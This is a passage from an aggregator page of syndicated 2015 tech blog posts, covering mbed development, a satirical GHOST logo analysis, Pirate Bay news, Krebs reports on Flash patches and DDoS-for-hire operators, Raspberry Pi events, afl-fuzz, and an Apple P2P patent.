Second on my testing with mbed was a RePaper display with version 1 breakout board. In initial testing with the Nucleo F401RE I could manage to get a single image displayed but was never able to update the display to a second image. Unfortunately, switching over to an NXP LPC1768 based Arch Pro board left me unable to render even an initial image. The same display using the drivers on a BeagleBone Black allowed the screen to be run normally. So it is likely to be an issue with the combination of hardware and epaper library that I was using for mbed.

Bringing the IDE to the Linux desktop

While the online IDE might be sufficient for some, there are also likely to be many developers who have their editor of choice and want to be free of the Web browser.

To develop locally, download the GCC ARM Embedded toolchain, for example, gcc-arm-none-eabi-4_9-2014q4-20141203-linux.tar.bz2 and expand it to /usr/local. Then add the new executables to your PATH, in this case the directory /usr/local/gcc-arm-none-eabi-4_9-2014q4/bin. Then to bring a project to the local machine from the online IDE, right click on the project and select the board you are wanting to use, and GCC (ARM Embedded) as the export toolchain. This will result in a zip file being offered by the Web browser for download.

Expand that zip file somewhere convenient, change directory into the base directory of the newly expanded files. This will be a directory with the same name as the project you right clicked on in the online IDE. Then, with the GCC ARM Embedded toolchain in your PATH you can just type make to build the new bin file to copy to your hardware.

One file that is likely to be of great interest in your local filesystem is, for example, the mbed/TARGET_NUCLEO_F401RE/TARGET_STM/TARGET_NUCLEO_F401REw/PinNames.h file. The TARGET directory names will be different for different hardware boards. Being able to see that the Arduino pin D2 is also PA_10 and that LED1 through LED4 all map to PA_5 for the F401RE will likely help while you are writing your programs.

Capable hardware and persistance

There are APIs for SPI, TWI, digital and analog IO for mbed. The syntax for digital IO is much more terse than that for the Arduino IDE. In mbed each pin can be toggled using simple assignment and where modes are used the pin object itself has support method to be set to input or output. The mbed environment also supports advanced features like threading and TCP/IP interaction including HTTP, WebSockets, as well as NTP and SMTP clients.

The mbed environment supports a range of microcontroller boards and makes it fairly simple to get up to speed and start using a new mbed compatible board. Having capable hardware such as the ST Nucleo F401RE available for a little over $10 makes having a tinker with embedded hardware fairly inexpensive. Although I had a mixed result with the ePaper display, sometimes hardware tinkering is all about persistence no matter what platform you are using.

lcamtuf's blog: Technical analysis of Qualys’ GHOST

This post was syndicated from: lcamtuf's blog and was written by: Michal Zalewski. Original post: at lcamtuf's blog

This morning, a leaked note from Qualys’ external PR agency made us aware of GHOST. In this blog entry, our crack team of analysts examines the technical details of GHOST and makes a series of recommendations to better protect your enterprise from mishaps of this sort.


Figure 1: The logo of GHOST, courtesy of Qualys PR.

Internally, GHOST appears to be implemented as a lossy representation of a two-dimensional raster image, combining YCbCr chroma subsampling and DCT quantization techniques to achieve high compression rates; among security professionals, this technique is known as JPEG/JFIF. This compressed datastream maps to an underlying array of 8-bpp RGB pixels, arranged sequentially into a rectangular shape that is 300 pixels wide and 320 pixels high. The image is not accompanied by an embedded color profile; we must note that this poses a considerable risk that on some devices, the picture may not be rendered faithfully and that crucial information may be lost.

In addition to the compressed image data, the file also contains APP12, EXIF, and XMP sections totaling 818 bytes. This metadata tells us that the image has been created with Photoshop CC on Macintosh. Our security personnel notes that Photoshop CC is an obsolete version of the application, superseded last year by Photoshop CC 2014. In line with industry best practices and OWASP guidelines, we recommend all users to urgently upgrade their copy of Photoshop to avoid exposure to potential security risks.

The image file modification date returned by the HTTP server at community.qualys.com is Thu, 02 Oct 2014 02:40:27 GMT (Last-Modified, link). The roughly 90-day delay between the creation of the image and the release of the advisory probably corresponds to the industry-standard period needed to test the materials with appropriate focus groups.

Removal of the metadata allows the JPEG image to be shrunk from 22,049 to 21,192 bytes (-4%) without any loss of image quality; enterprises wishing to conserve vulnerability-disclosure-related bandwidth may want to consider running jhead -purejpg to accomplish this goal.

Of course, all this mundane technical detail about JPEG images distracts us from the broader issue highlighted by the GHOST report. We’re talking here about the fact that the JPEG compression is not particularly suitable for non-photographic content such as logos, especially when the graphics need to be reproduced with high fidelity or repeatedly incorporated into other work. To illustrate the ringing artifacts introduced by the lossy compression algorithm used by the JPEG file format, our investigative team prepared this enhanced visualization:


Figure 2: A critical flaw in GHOST: ringing artifacts.

Artifacts aside, our research has conclusively showed that the JPEG formats offers an inferior compression rate compared to some of the alternatives. In particular, when converted to a 12-color PNG and processed with pngcrush, the same image can be shrunk to 4,229 bytes (-80%):


Figure 3: Optimized GHOST after conversion to PNG.

PS. Tavis also points out that “>_” is not a standard unix shell prompt. We believe that such design errors can be automatically prevented with commercially-available static logo analysis tools.

PPS. On a more serious note, check out this message to get a sense of the risk your server may be at. Either way, it’s smart to upgrade.

TorrentFreak: Pirate Bay Won’t Make A Full Comeback, Staff Revolt

This post was syndicated from: TorrentFreak and was written by: Ernesto. Original post: at TorrentFreak

pirate bayJudging from all the teasers on the Pirate Bay homepage the notorious torrent site is preparing to relaunch this weekend.

Those in control of the domain have yet to make an official announcement but several sources inform TF that the site won’t make a full comeback.

Instead, The Pirate Bay is expected to launch a trimmed down version without room for the dozens of moderators and admins who looked after the site over the past decade.

This lighter version of The Pirate Bay will be easier to operate but the plan has also upset many former staffers. This includes people who have been with the site for over a decade, removing fake torrents and other types of spam.

Several admins and moderators have responded to the news with anger and are now openly distancing themselves from the thepiratebay.se site that was their home for years.

“I wish I had better news to come with. The launch that is about to take place on February 1 is not us,” says WTC-SWE, one of the lead admins of The Pirate Bay.

“It was until some dickhead decided to take TPB crew out of the picture. He thinks a site can be run without any staff at all and at the same time keeping up with fakes, internal issues etc,” he adds.

What stings them the most is that many dedicated individuals, who put countless hours into keeping the site functioning, now appear to be being pushed aside on a whim.

“Personally I won’t accept this neither will any of the crew that’s been active for almost 10-11 years. As an admin and human, I won’t stand aside and accept this kind of behavior. This is the worst scenario that could happen,” WTC-SWE says.

“You don’t treat people like horseshit,” he adds.

The staff, now in open revolt, have closed the official #thepiratebay IRC channel on EFnet to the public. They won’t offer support anymore for a site that they have no ‘control’ over, but warn people who do want to visit it to be cautious of malware.

Instead, the TPB former crew members are now preparing to launch their own version of the site. This spin-off will be operated from a new domain and will have several long-time mods and admins on board.

WTC-SWE says that they are in possession of a TPB backup which will be used to revive the old site in full. The full staff of moderators and admins remains under his wings and will start over at a home.

“It’s only a matter of time. I will need to blast the whole coding and clean up all the mess. The real TPB will be back with proper staff and all,” WTC-SWE says.

Thus far, the people running the official thepiratebay.se domain have remained quiet. In a few days, when the count-down completes, we are likely to know more about their vision for the site’s future.

To be continued…

Source: TorrentFreak, for the latest info on copyright, file-sharing, torrent sites and anonymous VPN services.

Krebs on Security: Yet Another Emergency Flash Player Patch

This post was syndicated from: Krebs on Security and was written by: BrianKrebs. Original post: at Krebs on Security

For the second time in a week, Adobe has issued an emergency update to fix critical security flaws that crooks are actively exploiting in its Flash Player software. Updates are available for Flash Player on Windows and Mac OS X.

brokenflash-aLast week, Adobe released an out-of-band Flash Patch to fix a dangerous bug that attackers were already exploiting. In that advisory, Adobe said it was aware of yet another zero-day flaw that also was being exploited, but that last week’s patch didn’t fix that flaw.

Earlier this week, Adobe began pushing out Flash v. 16.0.0.296 to address the outstanding zero-day flaw. Adobe said users who have enabled auto-update for Flash Player will be receiving the update automatically this week. Alternatively, users can manually update by downloading the latest version from this page.

Adobe said it is working with its distribution partners to make the update available in Google Chrome and Internet Explorer 10 and 11. Google Chrome version 40.0.2214.93 includes this update, and is available now. To check for updates in Chrome, click the stacked three bars to the right of the address bar in Chrome, and look for a listing near the bottom that says “Update Chrome.”

To see which version of Flash you have installed, check this link. Windows users who browse the Web with anything other than Internet Explorer may need to apply this patch twice, once with IE and again using the alternative browser (Firefox, Opera, e.g.).

Raspberry Pi: Big Birthday Weekend – what’s happening, where and when

This post was syndicated from: Raspberry Pi and was written by: Liz Upton. Original post: at Raspberry Pi

More than 1000 of you have signed up already to come to our Big Birthday Weekend at the end of February. Tickets for Saturday are now sold out, but there are still about 80 left for the Sunday event.

We’ve had lots of excited email from people who are coming, who want to know more about what we’ll be getting up to. Mike Horne (who many of you know as Recantha) and Tim Richardson, who run the Cambridge Jams and who are doing the lion’s share of the organising for this event, have been kind enough to provide an update for everybody. 

We’d like to say a HUGE thank you to Mike, Tim and Lisa Mather, who are all members of our wonderful community who have volunteered to do the massive bulk of the organisational work on this event for us for free – we’re a very small team and we simply couldn’t have managed this without them all. Thanks guys!

Hello everyone. Mike Horne and Tim Richardson here to update you on the Raspberry Pi Big Birthday Weekend.

What has been happening?

It has been quite a couple of weeks. On the 13th of January, we visited the University of Cambridge Computer Laboratory in the hope that it would act as the venue for the Raspberry Pi Big Birthday Weekend. We were incredibly impressed with the place and we would like to thank Professor Jon Crowcroft for making us feel so welcome and showing us around. It is a brilliant venue and we are very lucky to be able to hold it there.

University of Cambridge Computer Laboratory

Since that visit, it would be fair to say that we haven’t stopped! We opened up booking on the 14th January and since then we have sold over 1000 tickets across the two days and the party. The party sold out first, closely followed by the Saturday day event. There are still tickets available for the Sunday, and we are now running a waiting list for the Saturday. If you’d like to join us on the Sunday or join the waiting list, please register.

What will be happening at the Big Birthday Weekend?

Each person who has registered has been asked how they would like to be involved with the weekend, and we have been absolutely inundated with offers of talks, requests to join discussion panels, offers to help run workshops and to take part in show and tell. Mike has been collating all these different offers and requests and the timetables are now being worked on with Liz and the team at the Raspberry Pi Foundation. We hope to be able to release a firm programme within the next week after we’ve contacted everyone involved again. What we can say so far is the following:

  • We will have two lecture theatres and two workshop rooms.
  • Talks include: Andy Proctor, talking about his Raspberry Pi-enabled truck; Jonathan Pallant from Cambridge Consultants talking
    about their penguin and rhino monitoring stations; and a healthy education element (we’ve had loads of offers of education talks). There will be LOTS more – we’re just trying to sort through everything now!
  • Panels will include: a group of youngsters talking about how the Raspberry Pi has changed their lives; advice on running crowdfunding campaigns; a Foundation Education Team panel; a technical panel including Raspberry Pi engineers; and Q&As with all the people you know from the Foundation from social media and this blog.
  • Workshops will include: an introduction to integrating the Pi with electronics; a session for beginner Pi users which will  help them get set up; basic Minecraft programming skills; advanced Minecraft hacking with GPIO interfacing; a Scratch hackathon.

Party time!

On the Saturday evening there is, of course, a birthday party. We have had to limit this to 275 people, due to catering arrangements. Logistics for the party are being spearheaded by Lisa Mather and Tim. Lisa has been an absolute star for agreeing to help with the party, especially as she’s way up in Manchester. From there, she has been organising goodie bags and decorations and generally being brilliant, coming up with ideas to make the Lab look welcoming and exciting, as well as lending her party planning experience to help us not to miss anything! Tim and Lisa are also working out what Pi-powered party games we will be having, as well as organising Pi-powered music for the occasion.

Marketplace

Tim has also been organising the Marketplace for the event. The Marketplace will feature many well-known names in the Pi community including The Pi Hut, PiBorg, 4Tronix, Pimoroni and also a newcomer to the Pi arena: IQaudio who specialise in GPIO audio boards. We are hoping that there will be another couple of vendors joining us, but they need to confirm with us.

Robots!

We’re inviting anyone who has their own Raspberry Pi-based robot to bring it along to show it off. At Pi Wars we had a highly popular obstacle course. This course will be making an appearance at the Birthday Weekend (after Tim has carefully put it all back together again!) and you are invited to bring your own robot to try it out!

Picture from  www.pi-tutorials.co.uk

Picture from www.pi-tutorials.co.uk

Further information

One of the other things we have been working on with the Foundation team is an information page for the event. On this page you will find information on the venue, parking and where to stay in Cambridge if you require accommodation. We hope you’ll find the information there useful. If you have any questions about the event, please mail mike.horne@raspberrypi.org and we’ll attempt to answer them as best we can and then add that information, if appropriate, to the information page.

That’s it for now – we are aiming to keep you up-to-date with what has been happening every week, so don’t forget to keep on checking back!

TorrentFreak: Spanish Government Orders Pirate Bay Blockade

This post was syndicated from: TorrentFreak and was written by: Andy. Original post: at TorrentFreak

pirate bayAfter years of developing a reputation as a piracy safe-haven, in recent times Spain has found itself under intense pressure to clamp down on copyright infringement.

After a serious of tweaks and adjustments to local copyright law, January 1st the country introduced tough new legislation backed up by hefty punishments for site operators.

Potential €600,000 fines were enough to scare some sites offline. Others, such as Pablo Soto’s Torrents.fm, disappeared without comment. While the climate in Spain is clearly a different one in 2015, there are now fresh signs of a new crackdown.

Spanish users of local ISP Vodafone have been reporting that their visits to The Pirate Bay are being redirected to a new URL – Castor.vodafone.es. Domain stats reveal that ThePirateBay.se and ThePirateBay.org are indeed two of the top referrers to that URL and that 100% of its traffic comes from Spain.

When Vodafone users began accusing their ISP of blocking The Pirate Bay without a court order, local media approached Vodafone for comment. In a statement yesterday the ISP said it had no knowledge of any blockade. This morning, however, Vodafone changed its mind.

The company now confirms it has received a blocking order from the Spanish government. Vodafone says that it has an obligation to comply with an order “issued by a competent authority”, in this case, the Ministry of Culture.

“In the current Copyright Act, there is a list of authorities who can order the blocking of a website to comply with legislation. That’s what we did,” a source at the company said.

Speaking with Gizmodo in Spain, Vodafone could not confirm the exact date when it began blocking the site but said it complied with the official request around Christmas. That would certainly fall into line with early problems experienced by some users.

It is currently unclear whether other ISPs in Spain have received the same instructions from the Ministry of Culture since ThePirateBay.se remains accessible via all ISPs except Vodafone.

Other major ISPs including Movistar and Orange say they cannot currently confirm if they have received similar blocking instructions from the government.

Today The Pirate Bay remains non-functional as a torrent site but its landing page, currently adorned with a phoenix, suggests a return to glory this coming weekend. If it does, Vodafone users will need a workaround.

Source: TorrentFreak, for the latest info on copyright, file-sharing, torrent sites and anonymous VPN services.

Krebs on Security: Spreading the Disease and Selling the Cure

This post was syndicated from: Krebs on Security and was written by: BrianKrebs. Original post: at Krebs on Security

When Karim Rattani isn’t manning the till at the local Subway franchise in his adopted hometown of Cartersville, Ga., he’s usually tinkering with code. The 21-year-old Pakistani native is the lead programmer for two very different yet complementary online services: One lets people launch powerful attacks that can knock Web sites, businesses and other targets offline for hours at a time; the other is a Web hosting service designed to help companies weather such assaults.

Grimbooter

Grimbooter

Rattani helps run two different “booter” or “stresser” services – grimbooter[dot]com, and restricted-stresser[dot]info. He also works on TheHosted[dot]me, a Web hosting firm marketed to Web sites looking for protection from the very attacks he helps to launch.

As part of an ongoing series on booter services, I reached out to Rattani via his Facebook account (which was replete with images linking to fake Youtube sites that foist malicious software disguised as Adobe’s Flash Player plugin). It turns out, the same Google Wallet is used to accept payment for all three services, and that wallet traced back to Rattani.

In a Facebook chat, Rattani claimed he doesn’t run the companies, but merely accepts Google Wallet payments for them and then wires the money (minus his cut) to a young man named Danial Rajput — his business partner back in Karachi. Rajput declined to be interviewed for this story.

The work that Rattani does for these booter services brings in roughly $2,500 a month — far more than he could ever hope to make in a month slinging sandwiches. Asked whether he sees a conflict of interest in his work, Rattani was ambivalent.

“It is kind of [a conflict], but if my friend won’t sell [the service], someone else will,” he said.

Rattani and his partner are among an increasing number of young men who sell legally murky DDoS-for-hire services. The proprietors of these services market them as purely for Web site administrators to “stress test” their sites to ensure they can handle high volumes of visitors.

But that argument is about as convincing as a prostitute trying to pass herself off as an escort. The owner of the attack services (the aforementioned Mr. Rajput) advertises them at hackforums[dot]net, an English language forum where tons of low-skilled hackers hang and out and rent such attack services to prove their “skills” and toughness to others. Indeed, in his own first post on Hackforums in 2012, Rajput states that “my aim is to provide the best quality vps [virtual private server] for ddosing :P”.

Damon McCoy, an assistant professor of computer science at George Mason University, said the number of these DDoS-for-hire services has skyrocketed over the past two years. Nearly all of these services allow customers to pay for attacks using PayPal or Google Wallet, even though doing so violates the terms of service spelled out by those payment networks.

“The main reason they are becoming an increasing problem is that they are profitable,” McCoy said. “They are also easy to setup using leaked code for other booters, increasing demand from gamers and other customers, decreasing cost of attack infrastructure that can be amplified using common DDoS attacks. Also, it is relatively low-risk to operate a booter service when using rented attack servers instead of botnets.”

The booter services are proliferating thanks mainly to free services offered by CloudFlare, a content distribution network that offers gratis DDoS protection for virtually all of the booter services currently online. That includes the Lizardstresser, the attack service launched by the same Lizard Squad (a.k.a. Loser Squad) criminals whose assaults knocked the Microsoft Xbox and Sony Playstation networks offline on Christmas Day 2014.

The sad truth is that most booter services probably would not be able to remain in business without CloudFlare’s free service. That’s because outside of CloudFlare, real DDoS protection services are expensive, and just about the only thing booter service customers enjoy attacking more than Minecraft and online gaming sites are, well, other booter services.

For example, looking at the (now leaked) back-end database for the LizardStresser, we can see that TheHosted and its various properties were targeted for attacks repeatedly by one of the Loser Squad’s more prominent members.

The Web site crimeflare.com, which tracks abusive sites that hide behind CloudFlare, has cataloged more than 200 DDoS-for-hire sites using CloudFlare. For its part, CloudFlare’s owners have rather vehemently resisted the notion of blocking booter services from using the company’s services, saying that doing so would lead CloudFlare down a “slippery slope of censorship.”

As I observed in a previous story about booters, CloudFlare CEO Matthew Prince has noted that while Cloudflare will respond to legal process and subpoenas from law enforcement to take sites offline, “sometimes we have court orders that order us to not take sites down.” Indeed, one such example was CarderProfit, a Cloudflare-protected carding forum that turned out to be an elaborate sting operation set up by the FBI.

I suppose it’s encouraging that prior to CloudFlare, Prince was co-creators of Project Honey Pot, which bills itself as the largest open-source community dedicated to tracking online fraud and abuse. In hacking and computer terminology, a honeypot is a trap set to detect, deflect or otherwise counteract attempts at unauthorized use or abuse of information systems.

It may well turn out to be the case that federal investigators are allowing these myriad booter services to remain in operation so that they can gather copious evidence for future criminal prosecutions against their owners and users. In the meantime, however, it will continue to be possible to purchase powerful DDoS attacks with little more than a credit card or prepaid debit card.

Raspberry Pi: Education, space, hacking and explosions – Bett 2015

This post was syndicated from: Raspberry Pi and was written by: Clive Beale. Original post: at Raspberry Pi

Last Tuesday the Raspberry Pi education team beetled down to the ExCeL London for Bett, the gargantuan learning technology event. We spent the next four days on our new and fabulous stand talking, educating, demo-ing, entertaining, showboating, dancing and gerrymandering. There were astounding demonstrations of technological ingenuity, feats of strength and curious electro-mechanical devices.

Ready for action: the education team plus James Robinson (leftest), Martin O'Hanlon (bluest) and Sam Aaron (tallest).

Ready for action: the education team plus James Robinson (leftest), Martin O’Hanlon (bluest) and Sam Aaron (tallest). Clive is weeping openly but laughing inside.

We were happily overrun by what seemed like most of the Raspberry Pi community, many of whom made guest appearances in our back to back schedule. We ran hands-on-workshops in Minecraft Pi, Sonic Pi, physical computing, games programming and much more. We stormed the BETT arena with Astro Pi and Fran Scott’s pyro-computing show. We ran about and hooted. It was a brilliant show. My post-show brain is far too fried to write so here are some of our favourite bits:

Carrie Anne kicks off the show with who the Raspberry Pi Foundation are and what we do

Carrie Anne kicks off the show with who the Raspberry Pi Foundation are and what we do

Set-up day. Dave says this is the only place he could get electricity.

Set-up day. Dave claims that this is the only place he could get electricity.

I am not a number, I am a free man.

I am not a number, I am a free man.

James about to send up a time-lapse Pi on a helium balloon to spy on other stands.

James about to send up a time-lapse Pi on a helium balloon to spy on other stands.

Laura Dixon's (@codeboom) students from the Royal High School Bath talking about  Minecraft coding and their computing club

Laura Dixon’s (@codeboom) students from the Royal High School Bath talking about Minecraft coding and their computing club

Dr Sam Aaron, creator of Sonic Pi, showing people how to create beautiful music with code

Dr Sam Aaron, creator of Sonic Pi, showing people how to create beautiful music with code

Stunned silence then cheering: a blackout at Bett. (Nothing to do with us, honest.)

Stunned silence then cheering: a blackout at Bett. (Nothing to do with us, honest.)

Dave Honess introducing Astro Pi and the ISS. His pitch-roll-yaw demo is now legend https://twitter.com/Raspberry_Pi/status/558960988096307200

Dave Honess introducing Astro Pi and the ISS. His pitch-roll-yaw demo is now legend

Lance Howarth and Astro Pi on Bett Arena

Lance Howarth and Astro Pi on Bett Arena

“My favourite moment was being rushed for Astro Pi leaflets at the end of the opening ceremony of the main arena. I have a great feeling about this whole thing” — Dave Honess

A first for Bett arena we think: Fran Scott exploding hydrogen -filled balloons in the Arena.

A first for Bett we think: Fran Scott exploding hydrogen-filled balloons in the Arena.

Of course it’s not so easy to blow up stuff in the classroom so we made a safe version, the Balloon Pi-tay Popper:

Fran demonstrating the explosive-free Balloon Pi-tay popper resource.

Fran demonstrating the explosive-free Balloon Pi-tay popper resource.

Connecting Minecraft Pi to the real world: @whaleygeek's Big Red Button of Doom!

Connecting Minecraft Pi to the real world: @whaleygeek’s Big Red Button of Doom!

Our friends from Pimoroni show of their brilliant Flotilla

Our friends from Pimoroni show off their brilliant Flotilla

Andrew Mullolland, a student at Queen's University Belfast, and his LTSP classroom management system for Raspberry Pi

Andrew Mulholland, a student at Queen’s University Belfast, and his LTSP classroom management system for Raspberry Pi

Stewards Academy student @jaymegisbourne demonstrating his Porta-Pi

Stewards Academy student @jaymegisbourne demonstrating his Porta-Pi

Raspberry Pi Certified Educators Cat Lamin and Tom Sale show how easy it is to use Pis in Primary Schools

Raspberry Pi Certified Educators Cat Lamin and Tom Sale show how easy it is to use Pis in primary schools

Carrie Anne picks up her Best Author Award for Adventures in Raspberry Pi...

Carrie Anne picks up her well-deserved Best Author award for Adventures in Raspberry Pi…

...and celebrates in style with David Whale (@whaleygeek)

…and then celebrates in style with David Whale (@whaleygeek)

And that was that. Four days of manic educational goodness.

Thanks to CPC for supporting us, we couldn’t have done it without them. We had a fabulous stand and a great team across the way to give hardware advice and support.

A huge thanks to everyone who gave talks and demos and who helped out on the stand including: Sam Aaron, Laura Dixon, Martin O Hanlon, Alasdair Davies, Dave Honess & UK Space, Eliot Williams, Paul Beech, Jon Williamson, Phil Howard, David Whale, Tim Mockford, Simon Belshaw, Lauren Hyams, Fran Scott, Mike Horne, Tim Richardson, Jamie Mann, Matthew Parry, Cat Lamin, Tom Sale, Wolfram, Stephen Norbury, Naturebytes, Samantha Lubbe, Barry Byford, Karl-Ludwig Butte, Robin Newman, Andrew Mulholland, Spencer Organ, Geraldine Wright, Stewards Academy Raspberry Pi Club, and Cefn Hoile. If I’ve missed anyone then sorry and please email me!

Lastly a big thank you to all of the teachers, students, parents, educators and anyone else who came to see us. See you again next year!

TorrentFreak: Pirate Party MEP Fails to Deliver True Copyright Reform

This post was syndicated from: TorrentFreak and was written by: Amelia Andersdotter. Original post: at TorrentFreak

copyright-brandedThe Pirate Party did not only manage to continue its presence in the European Parliament by having German Pirate Julia Reda elected. It also secured the politically important role of rapporteur on copyright reform. High expectations for a long overdue upheaval of the status quo in the political debates on copyright were warranted.

But in Julia Reda’s draft report on copyright reform from Monday January 19, there is little to nothing in it that can be considered as a fulfillment of those expectations.

Her proposals for a new European copyright can be summarized as ”more of the same”. She wants the European Union to make a regulation, which means directly applicable at the member state level. This regulation, she suggests, can contain all of the current bits of copyright. This is by itself useful, especially for American technology companies that want to repeat their US successes and are confronted with a European market that is highly fragmented by its wildly disparate copyright laws.

Half of her report deals with the consequences of making a regulation. Of course, exceptions and limitations will be harmonized if the European law is directly applicable in all the member states. What people were requesting were broader exceptions and limitations and a re-assessment of the copyright framework and legal certainty for the benefit of individuals. Instead they’re getting benefits for corporations. What Julia proposes is to maintain things in their present state, while making it more difficult for individuals to influence local laws.

Part of the report deals with Julia’s admiration for the European Court of Justice rulings in the Svensson (hyperlinking), Best Water International (embedded videos) and Vlaams Belang (parody) cases. Respecting the judiciary is good, but not reform-friendly. The political mission outside of pure constitutional law is setting the framework for the judiciary, not to follow its lead.

Another sixth of the report – most of the progressive bits – deals with database rights. Julia does not, however, propose to change database rights. It’s in equal measure tragic and deceptive: she’s tricking people into believing she wants something, but she’s not giving herself the political space to accomplish that thing. Expecting us to cheer for her, no doubt, while she’s gutting the opportunity for realizing the hopes she inspires.

Even the European Commission has set a higher standard for themselves than this. It has acknowledged since 2009 that there is a problem with the substance of copyright. Their 2013 copyright consultation, it acknowledges, indicates that citizens, consumers and a large number of other actors experience problems with both the economic justice and the principles of copyright. De facto, Julia Reda is more conservative than the European Commission, and this is a massive problem for representative democracy.

While the Commission acknowledges remixing and transformative uses are important to a large number of users, Julia ”notices with interest” that remixing occurs. She praises the level of balancing between rightsholders’ interests that the European copyright laws achieve. The Commission acknowledges instead that neither citizens or authors feel that such a balance exists. Is she making anyone happy?

The only proposal which makes even remote sense are two paragraphs on technological protection measures. In the cybersecurity spirit of the European Parliament established in its NSA resolution of 2014, she suggests not to put blackboxes in consumer IT products. So we have a copyright-friendly, cyber-security inspired German trying to impose a Brussels-made statist policy on 507 millions citizens of Europe which leaves stuff more or less the same. Angela Merkel could not have done it better had she tried.

About The Author

ameliaa

Amelia Andersdotter represented the Swedish Pirate Party in the European Parliament between December 2011 and July 2014. She’s an expert on topics related to the Internet, intellectual property and IT-policy.

Source: TorrentFreak, for the latest info on copyright, file-sharing, torrent sites and anonymous VPN services.

lcamtuf's blog: Looking back at three months of afl-fuzz

This post was syndicated from: lcamtuf's blog and was written by: Michal Zalewski. Original post: at lcamtuf's blog

I originally released afl-fuzz, a security-oriented fuzzer driven by a simple genetic algorithm, somewhere in November of 2013. Back then, it was simply another take on an idea I first toyed with in 2007, inspired in large part by the work on fuzzer corpus distillation done by Tavis Ormandy. It almost ended up in the dustbin of history: early on, the project had many shortcomings, and I was swamped with other work – so I ended up not announcing it properly and not touching it for almost a year.

But then, when the “Shellshock” vulnerability came by in October 2014, and we were increasingly suspicious about the original patch, I decided to dust off an early incarnation of afl-fuzz and take it for a quick spin. I was actually pretty surprised at how good it turned out to be at navigating bash syntax – and how quickly it found additional bugs that weren’t predicated simply on flipping random bits, but on being able to synthesize the syntax of the underlying files. A couple of additional tests confirmed that the underlying approach was probably worth more than I have given it credit for.

And so, over the past few months, afl-fuzz has seen almost constant development, with several releases every week. The changes range from sweeping performance and fuzzing strategy improvements, to a clever fork server design proposed by Jann Horn, to visualization capabilities sketched out by Michael Rash, to a crash exploration mode to help in impact analysis, to robust test case and corpus minimization tools (afl-tmin, afl-cmin), to spiffy grammar-aware modes that lessen the need for format-specific tools, to support for *BSD systems, MacOS X, Solaris… and much more.

Since then, afl-fuzz helped squash hundreds of bugs, in part due to a community of folks who found the tool to be fun to use. For example, it has been used by OpenBSD developers to beef up anything from pfctl, to tcpdump, to rcs. Jodie Cunningham relied on it to identify dozens of distinct issues in ImageMagick (GraphicsMagick team had kind words for the tool, too). LLVM developers run it on a corpus of C files to get rid of a sizable pile of compiler issues. Jakub Wilk has worked tirelessly to squash numerous vulnerabilities in the Debian tree. Alex Eubanks used it to find security bugs in PHP and libpng. Many other folks took on “hot” projects such as mozjpeg or libbpg, with predictable results. Out of the few dozen pending security fixes in libtiff, the vast majority likely traces back to afl-fuzz, in part thanks to the work of Tobias Ospelt, William Robinet, and Paris Zoumpouloglou.

Compared to projects such as Mayhem, I’m particularly happy that afl-fuzz has a knack for finding complex issues in relatively tough, security-relevant targets that we actually need to get in a good shape – including security holes in IJG jpeg, libjpeg-turbo, libpng, Firefox, Internet Explorer, GnuTLS, GnuPG, unzip, or file. Heck, the fuzzer even managed to find crash-only bugs in OpenSSH and multiple non-trivial crashing SQL statements in sqlite3. On a much less serious but funny note, it also triggered an somewhat embarrassing security bug in splint, a tool for, quoth, “statically checking C programs for security vulnerabilities and coding mistakes”

All in all, I’m very happy and humbled with the success of the tool, and how many developers are just grabbing it and running it against their projects without having to spend hours to fiddle various knobs. The afl-users@ mailing list is now 120+ members strong – and I’ll do my best to keep the fuzzer useful and enjoyable to play with :-) Many feature suggestions ship in a matter of days – so if you have any ideas, be sure to send them in.

(And if you haven’t looked at afl-fuzz recently, give it a try!)

TorrentFreak: Zombie Pirate Bay Tracker Fuels Chinese DDoS Attacks

This post was syndicated from: TorrentFreak and was written by: Ernesto. Original post: at TorrentFreak

pirate bayOn November 2009 The Pirate Bay announced that it would shut down its tracker for good.

Trackers were outdated according to the site’s owners. Instead, they encouraged BitTorrent users to rely on DHT, PEX and other trackerless technologies.

Despite the fact that the tracker is no longer functional, many old and some new torrents still include the tracker.thepiratebay.org announce address.

While the tracker hasn’t responded to these calls for five years, for some server admins it has now risen from the dead.

Starting early January hundreds of websites have been plagued by traffic from China. While the exact reason remains unclear, it appears that the Great Firewall of China may be in part causing the problems.

Due to a reconfiguration the Pirate Bay domain is being linked to random IP-addresses. This problem applies to various censored sites, but the thousands of connections per second coming from tracker.thepiratebay.org stand out for most people.

It is no secret that BitTorrent users can easily DDoS websites if the tracker address points to the wrong IP, but we haven’t witnessed something of this magnitude before.

Below is a graph Craig Hockenberry posted of a DDoS on his server where the number of requests peaked at 52 Mbps per second, with torrent announces being the most common source.

dailyddos

The suspicion that Chinese efforts to censor the Internet have something to do with the problems seems plausible. Querying Chinese DNS servers returns many seemingly random IP-addresses that change all the time.

In other words, requests to the dead Pirate Bay trackers are sent to seemingly random servers, and none of these have anything to do with the notorious torrent site.

Johannes Ullrich, CTO of SANS Internet Storm Center, came to a similar conclusion and many of his readers reported problems of the same nature.

“We also get a lot of this type of traffic for the last 2 weeks. At moments it causes a total DoS for our webserver. Most of the traffic has thepiratebay as hostname in the http request, but we also see akamai, edgecdn and some more obscure and explicit sites passing in our logs,” Arjan says.

“I work in the banking sector in the UK. We started to see this traffic hit our web servers just before the new year and it has continued since, but thankfully not on a harmful scale. We’ve seen various sites in the host header, including thepiratebay, facebook, googlevideo – all of which appear to be restricted within China,” Anonymous adds.

And the list goes on and on.

Over the past several days reports have come from all over the place, all describing the same problem. Thus far, most server admins have decided to filter out Chinese traffic, which eases the load. But the underlying problem persists.

For now the true origin of the zombie DDoSes remains unknown, but hopefully those responsible will soon realize the crippling mistake they’ve made, and put Pirate Bay’s tracker back in the ground.

Source: TorrentFreak, for the latest info on copyright, file-sharing, torrent sites and anonymous VPN services.

TorrentFreak: Apple Patents Technology to Legalize P2P Sharing

This post was syndicated from: TorrentFreak and was written by: Ernesto. Original post: at TorrentFreak

apple-p2pLittle over a decade ago Apple revolutionized the music industry with its iTunes store, allowing people to purchase digital copies of their favorite music.

With iTunes, Apple offered pirates a legal option, but the company still sees value in “sharing” music and other media with friends and family.

In fact, the company was just awarded a patent that makes it possible to license P2P sharing.

Titled “decoupling rights in a digital content unit from download” the patent describes a system where users can freely share music and videos with each other. Instead of getting the actual file from iTunes or other stores, users would only need to obtain a license.

Once licensed these files can be shared freely across one’s own devices, with friends, family or even complete strangers.

applepat1

According to Apple such a system has several benefits. Among other things, reduced bandwidth and other overhead costs. This may result in a separate and cheaper price tier for those users who only have to license a media file.

